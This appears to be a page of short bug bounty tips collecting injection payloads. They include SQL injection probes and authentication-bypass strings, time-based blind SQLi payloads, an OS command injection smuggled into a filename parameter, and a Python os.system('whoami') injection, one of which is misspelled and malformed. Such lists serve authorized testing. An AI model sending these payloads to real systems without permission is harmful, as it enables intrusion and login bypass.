Last updated 8 days ago
#BugBountyTip did you know that the character '_' acts like the regex character '.' in SQL queries …
#bugbountytip It's possible to fire up "#OS #Command #Injection" instead of #XSS in Filename.PDF?parameter=PAYLOAD+|+Dir+c:\
#bugbountytips When you're trying to trigger a Command Injection flaw in #Python Web Application try to surround your payload with str() funciton i.e "%2bstr(__import.('os').system('whoami'))%2b"
Use Burp Intruder for Expression Language Injection and grep the response for 7744 :)
I found two SQL Injections tonight in private programs. One blind and the other hanging in plain sight. Here’s a tip. Wayback -> -> grep | .php?id=
Give this a try while testing for SQLi Authentication Bypass :
username: '--' / "--" password: '--' / "--"
Basic payload to test SQLi in Burp Repeater: '; waitfor delay '0:0:3' -- Check the time in the Response side if it delays the same as you change the seconds in the payload.
This is how I found sql-Injection 100% of the time For /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips
SQLi Polyglot SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ by@avlidienbrunn